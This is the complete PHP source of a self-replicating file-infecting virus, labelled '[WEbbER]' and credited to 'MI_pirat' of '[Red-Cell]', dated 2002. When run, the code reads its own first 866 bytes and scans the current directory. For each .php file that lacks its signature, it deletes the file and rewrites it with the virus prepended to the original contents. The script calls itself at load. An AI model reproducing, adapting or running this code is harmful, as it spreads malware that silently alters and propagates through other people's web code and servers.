<?php
function webb()
{
//[WEbbER] by MI_pirat
//Copyright (C) 2002 [Red-Cell] inc.
$c = "";
//Get the virus from the host file
$f = fopen (__FILE__, "r");
$c = fread ($f, filesize (__FILE__));
fclose ($f);
$c = substr($c,0,866);
//Search for files to infect
$handle=opendir('.');
while (($file = readdir($handle))!==false) {
if ($file != "." && $file != "..") 
 {
$s = substr($file, -3);
//If not infected yet, infect it!
if ($s=="php") 
   {
	$g = fopen ($file, "r"); 
	$cont = fread ($g,filesize ($file));      
	fclose ($g);
	if (!strstr($cont,"[WEbbER]")) //check the signature
	{
	unlink("$file"); //delete and prepend the virus
	$g = fopen ($file, "a+"); 
	fwrite ($g,"$c");      	
	fwrite ($g,"\n");
	fwrite ($g,substr($cont,5)); //append the original file
	fclose ($g);
	}
   }

 }

}

closedir($handle); 
}
webb();
?>